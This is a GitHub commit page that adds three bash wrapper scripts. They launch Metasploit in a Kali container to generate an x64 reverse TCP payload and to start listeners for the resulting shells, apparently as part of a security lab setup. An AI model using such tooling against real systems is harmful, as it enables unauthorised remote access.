Skip to content

Commit

Permalink
Adding scripts
Browse files Browse the repository at this point in the history
  • Loading branch information
archcloudlabs committed Aug 12, 2023
1 parent 2a070ef commit 328523d
Show file tree
Hide file tree
Showing 3 changed files with 15 additions and 0 deletions.
5 changes: 5 additions & 0 deletions scripts/generate_payload.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
#!/bin/bash
echo -e "[+] Generating MSF payload"
podman run \
-v `pwd`:/tmp/:z localhost/kali:msf \
msfconsole -r /tmp/configs/x64_reverse_tcp_payload_gen.msf
5 changes: 5 additions & 0 deletions scripts/start_bof_handler.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
#!/bin/bash
podman run -ti \
--net=host \
-v `pwd`:/tmp/:z kali:msf \
msfconsole -q -r /tmp/configs/x64_reverse_tcp_payload_handler_bof.msf
5 changes: 5 additions & 0 deletions scripts/start_handler.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
#!/bin/bash
podman run -ti \
--net=host \
-v `pwd`:/tmp/:z kali:msf \
msfconsole -r /tmp/configs/x64_reverse_tcp_payload_handler.msf

0 comments on commit 328523d

Please sign in to comment.